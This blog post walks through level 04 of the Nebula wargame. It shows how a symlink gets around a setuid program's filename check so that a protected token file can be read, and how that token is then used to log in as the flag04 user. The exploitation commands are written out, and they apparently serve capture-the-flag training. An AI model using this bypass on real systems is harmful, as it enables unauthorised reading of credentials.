After analyzing it, we conclude that the program is opening the file specified in the first argument, reading it's contents, and writing them to the standard output (1 is the file descriptor for the standard output, or stdout, else defined as STDOUT_FILENO).
In the /home/flag04 directory we notice that there's a file named token:
level04@nebula:~$ ls -l /home/flag04 total 12 -rwsr-x--- 1 flag04 level04 7428 2011-11-20 21:52 flag04 -rw------- 1 flag04 flag04 37 2011-11-20 21:52 tokenCould we use flag04 to print out the contents of token? As it turns out, flag04 will not allow us to dump the contents of files containing "token" in their name.
This challenge requires us to know about symlinks (short for Symbolic Links). Symlinks are linux's equivalent of shortcuts. We can create a symlink using ln, and the resulting file will be effectively the same as the original file. You can learn more about symlinks in wikipedia or in ln's man page ("man ln").
Getting the token
Easily enough, we create a symlink for "token" with a different name, and run flag04 on it.level04@nebula:~$ ln -s /home/flag04/token t level04@nebula:~$ /home/flag04/flag04 t 06508b5e-8909-4f38-b630-fdb148a848a2There's our token. As it turns out the token is also the password for user flag04.
So let's get that flag :)
level04@nebula:~$ su flag04 -c getflag Password: You have successfully executed getflag on a target account
~ Dmitry
No comments:
Post a Comment